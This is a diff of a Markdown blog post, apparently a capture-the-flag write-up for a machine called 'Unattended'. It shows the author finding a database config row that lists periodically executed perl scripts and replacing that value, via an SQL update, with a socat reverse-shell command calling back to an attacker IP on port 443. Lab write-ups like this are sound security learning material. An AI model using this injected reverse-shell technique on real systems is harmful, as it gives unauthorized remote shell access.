0xRick/0xRick.github.io/_posts/2019-8-24-unattended.md

 MariaDB [neddy]>
 ```
-#### The row with id 86 looks interesting.
+<br> The row with id 86 looks interesting.
 It has a value of some `perl` scripts :
 ```
 /home/guly/checkbase.pl;/home/guly/checkplugins.pl;
 ```
-#### Apparently these scripts get executed from time to time, we can't read these scripts or replace them, but we can change the value of that configuration from the database and put a reverse shell command.
+<br> Apparently these scripts get executed from time to time, we can't read these scripts or replace them, but we can change the value of that configuration from the database and put a reverse shell command.
 There's no `nc` so I used `socat` :
 ```
 MariaDB [neddy]> update config set option_value="socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.xx.xx:443;" where id=86;
 Query OK, 0 rows affected (0.00 sec)